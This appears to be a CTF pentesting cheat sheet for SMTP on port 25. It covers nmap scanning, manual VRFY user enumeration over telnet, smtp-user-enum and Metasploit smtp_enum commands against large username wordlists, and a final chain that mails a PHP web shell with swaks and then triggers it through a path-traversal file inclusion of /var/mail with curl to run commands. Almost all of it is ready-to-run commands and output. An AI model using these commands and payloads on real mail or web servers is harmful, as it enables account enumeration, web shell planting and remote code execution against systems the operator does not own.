ctf flag port25 25 - Pentesting smtp Nmap nmap -p 25 -sV -sC -Pn 192.168.0.102
...
25/tcp open smtp Postfix smtpd
...
Enumeration - Telnet > telnet 10.0.2.5 25
> VRFY root
< 252 2.0.0 root
> VRFY szalek
< 550 5.1.1 <szalek>: Recipient address rejected: User unknown in local recipient table
> VRFY admin
< 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
> VRFY user
< 252 2.0.0 user
Enumeration - smtp-user-enum smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
Executing command Send email swaks --to asterisk@localhost --from admin@vtiger.htb --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $(target)
Execute curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'